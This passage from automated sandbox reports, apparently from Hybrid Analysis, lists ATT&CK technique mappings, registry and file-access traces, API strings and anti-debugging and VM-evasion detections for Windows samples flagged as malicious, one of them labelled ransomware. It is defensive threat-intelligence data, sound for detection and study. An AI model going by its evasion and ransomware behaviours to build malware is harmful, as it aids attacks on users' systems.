Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Local Email Collection", "attck_id": "T1114.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114/001", "informative_identifiers_count": 1, "parent": {"technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc\" file has an entrypoint instructions - \"mov\tcl, 0x39,retf\t,mov\teax, dword ptr [0x4faa62d0],xchg\tdword ptr [esi + 0x16], ebx,xchg\teax, ebx,mov\tdh, 9,out\tdx, eax,bound\teax, qword ptr [esi + 0x5f7e111],sub\tbh, byte ptr cs:[ecx],mov\tdword ptr [eax + 0x6aed3e33], ecx,push\t0xe924d70c,pop\tes,out\t0x55, eax,add\tdword ptr [ebp + 1], ecx,inc\tebx,jle\t0x41da5e,mov\tebp, 0x24db0554,movsb\tbyte ptr es:[edi], byte ptr [esi],sbb\tdword ptr [ebp - 0x11], ecx,add\tesp, dword ptr [ebp - 0x7e],cmp\tdh, byte ptr [edx],sar\tdword ptr [esi], cl,xor\tdword ptr [eax - 0x42], edx,pop\tebx,das\t,inc\tebp,pop\tds,fcomp\tdword ptr [ebp + 0x31],cmp\tebx, esi,pop\teax,and\tbyte ptr [ecx + 0x4b61c174], cl,call\t0xef1b126,adc\tal, 0xb2,pop\tecx,mov\tebx, 0x841df85,outsd\tdx, dword ptr [esi],push\tcs,mov\tesp, dword ptr [edx + 0x75],dec\tebx,inc\tebp,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75C30000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc\" was detected as \"WinRAR\" and name: \"sfx\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc\" was detected as \"RAR\" and name: \"Archive\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "binary-26", "type": 8, "relevance": 5, "name": "The input sample possibly contains the RDTSCP instruction", "description": "Found VM detection artifact \"RDTSCP trick\" in \"sample.bin\" (Offset: 553314)", "origin": "Binary File", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to access non-existent file \"C:\\SspiCli.dll\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to access non-existent file \"C:\\MPR.dll\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to access non-existent file \"C:\\MPR.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\APPCOMPATFLAGS\"; Key: \"\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\APPCOMPATFLAGS\"; Key: \"SHOWDEBUGINFO\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"CC63F36DC17A0A98AA80E296F467CDA6A1E0771E8D1B224EFE524B532E7BC3DC\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to access non-existent file \"C:\\cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe.Local\\\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to access non-existent file \"C:\\WINSPOOL.DRV\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to access non-existent file \"C:\\CC63F36DC17A0A98AA80E296F467CDA6A1E0771E8D1B224EFE524B532E7BC3DC.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe.Local\\\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\\COMCTL32.dll\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\Windows\\AppPatch\\AcLayers.DLL\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\SspiCli.dll\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\Windows\\system32\\SspiCli.dll\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\WINSPOOL.DRV\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\Windows\\system32\\WINSPOOL.DRV\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\MPR.dll\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\Windows\\system32\\MPR.dll\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\CC63F36DC17A0A98AA80E296F467CDA6A1E0771E8D1B224EFE524B532E7BC3DC.EXE.LOCAL\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\\comctl32.dll\"\n \"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"CreateProcessA\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNEL32.DLL)\n Found string \"GlobalFree\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNELBASE.DLL)\n Found string \"SetCurrentDirectoryA\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNELBASE.DLL)\n Found string \"GetCurrentDirectoryA\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNELBASE.DLL)\n Found string \"GetComputerNameW\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNEL32.DLL)\n Found string \"GetFileSizeEx\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNELBASE.DLL)\n Found string \"GetFileSize\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNELBASE.DLL)\n Found string \"GetWindowsDirectoryW\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNELBASE.DLL)\n Found string \"GetFileAttributesA\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNELBASE.DLL)\n Found string \"SizeofResource\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNELBASE.DLL)\n Found string \"LockResource\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNELBASE.DLL)\n Found string \"LoadResource\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNELBASE.DLL)\n Found string \"FindResourceA\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNEL32.DLL)\n Found string \"OpenMutexA\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNEL32.DLL)\n Found string \"GetFullPathNameA\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNELBASE.DLL)\n Found string \"CopyFileA\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNEL32.DLL)\n Found string \"GetProcessHeap\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNELBASE.DLL)\n Found string \"VirtualProtect\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNELBASE.DLL)\n Found string \"IsBadReadPtr\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNEL32.DLL)\n Found string \"CreateDirectoryA\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: KERNELBASE.DLL)\n Found string \"wsprintfA\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: USER32.DLL)\n Found string \"RegQueryValueExA\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: ADVAPI32.DLL)\n Found string \"RegSetValueExA\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: ADVAPI32.DLL)\n Found string \"RegCreateKeyW\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: ADVAPI32.DLL)\n Found string \"CryptReleaseContext\" (Source: cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc, API is part of module: ADVAPI32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc\" has section name .text with entropy \"7.51877850735\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "api-238", "type": 6, "relevance": 5, "name": "Tries to detect debugger using ProcessDebugPort", "description": "\"cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe queries ProcessDebugPort (UID: 6040)", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (D)", "origin": "External System"}]}
a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5
https://hybrid-analysis.com/sample/a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5
Hybrid Analysis - Ransomware
{"size": 606076, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "submit_name": "a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5", "sha256": "a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5", "av_detect": 87, "vx_family": "Trojan.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 163, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 606080, "sha256": "6f7c54146e31db911dc9e48adec7acc54517c949fa016323a60160224a120638", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS 